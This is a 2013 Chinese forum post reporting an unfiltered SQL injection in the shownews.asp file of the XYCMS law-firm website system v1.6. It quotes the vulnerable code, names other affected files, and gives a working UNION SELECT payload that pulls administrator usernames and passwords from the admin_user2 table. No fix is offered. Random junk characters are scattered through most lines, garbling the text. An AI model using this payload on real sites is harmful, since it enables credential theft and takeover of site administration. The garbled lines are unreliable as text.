前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似
* d2 q; X9 t; x# N0 W' U$ H
3 f: M1 H4 W$ u! `8 x淫荡分割线5 A J: p& n9 H# c! ^6 E
--------------------------------------------------------8 i' p- F/ p0 A, A
' m8 X% Q+ g& O g
审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)- M1 V( e- s6 B5 X# @' Z# {! \
源码地址:http://down.chinaz.com/soft/29233.htm
; x: b# e4 A1 j9 ]5 D. X* [/ t" W
3 }6 M( _, `3 I& L) D漏洞文件:shownews.asp
; M4 K h( v1 T漏洞代码:7-13行
9 f3 }* q( }" _) X+ f% t
- E3 S* o& r; S) R1 Q1 q7 |# d
( e5 \3 f; H+ \/ i' `# A+ p- H<% ) p+ W* F& l6 S7 R. }
id=request.QueryString("id")
/ v6 R6 i) u7 h" R
6 G2 C7 A' A# w. ?% ~* V6 i! Sset snews=server.createobject("adodb.recordset") , q1 o3 i c, K: p- T. F) O
exec="select * from [news] where id="&id
# z8 \7 v" a& g2 Xsnews.open exec,conn,1,1
4 _9 K) J" F3 c' x: E8 o1 o%>4 s8 j( ~( s+ x# B0 J
x# l2 ~/ ?: Q( L N7 L % n6 d3 d) B+ s! h) p1 n
什么过滤都没有 直造成注入
0 V& a9 P9 @0 M/ R
# Y, c6 O9 B2 g I0 m注入点:http://127.0.0.1:99/shownews.asp?id=xx
# c8 [/ I, l5 Y5 ` 7 @0 q1 ^ P O
其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找
2 r% m6 L9 P# {6 ^+ z- K* b4 a" u; c9 X
, `3 l; g( k# M; h
% ^$ l: ?& o4 M* s( Lexp: union select 1,admin,password,4,5,7 from admin_user2 a( ^% D0 E/ `8 Y2 d5 }% {* ^9 _3 G
9 c* ^) _' Q( C: [ |
发表于 2013-4-4 17:28:12
收藏
支持
反对